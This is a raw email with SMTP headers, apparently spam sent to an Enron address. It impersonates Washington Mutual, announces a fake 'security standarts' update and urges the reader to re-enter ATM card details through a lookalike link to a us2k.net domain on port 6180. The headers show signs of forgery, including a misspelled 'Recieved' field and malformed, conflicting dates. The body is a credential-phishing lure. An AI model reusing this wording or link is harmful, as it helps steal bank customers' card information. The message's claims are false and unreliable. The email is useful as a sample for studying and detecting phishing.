Recieved: from nahou-mscnx06p.corp.enron.com ([192.168.110.237]) by NAHOU-MSMBX07V.corp.enron.com with Microsoft SMTPSVC(5.0.2195.2966);
	 Thu, 30 Aug 2001 18:40:24 -0800
Received: from corp.enron.com ([192.168.110.224]) by nahou-mscnx06p.corp.enron.com with Microsoft SMTPSVC(5.0.2195.2966);
	 Thu, 30 Aug 2001 20:38:27 -0600
Received: from mailman.enron.com (unverified) by corp.enron.com
 (Content Technologies SMTPRS 4.2.1) with ESMTP id <T5a0a351531c0a86ee241c@corp.enron.com> for <tdonoho@exchange.enron.com>;
 Thu, 30 Aug 2001 20:37:53 -0600
Received: from BABY (dsl-084-056-064-118.arcor-ip.net [84.56.64.118])
        by mailman.enron.com (8.11.4/8.11.4/corp-1.06) with ESMTP id g343Bbl41490
        for <tom.donohoe@enron.com>; Thu, 30 Aug 2001 21:35:58 -0500 (CDT)
From: "Artieloren" <hiromuchingfu@puertorrico.com>
To: "Ardyskyeong" <tom.donohoe@enron.com>
Date:WFri, 31 Aug 2001 15:37:01 +0100
Subject: Cornelayoun?
Date:WFri, 31 Aug 2001 15:37:01 +0100
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii" 
Message-ID: <110729974267216107>

Washington Mutual: Notifications


We are glad to inform you, that our bank is switching to new transactions security standarts. Our ATM services utilize advanced security technology to protect your personal financial information. This security update will be effective immediately and requires our customers to update their ATM card information.

Please visit Washington Mutual Online Banking page or click below:

http://login.personal.wamu.com.us2k.net:6180

Thank you for choosing Washington Mutual
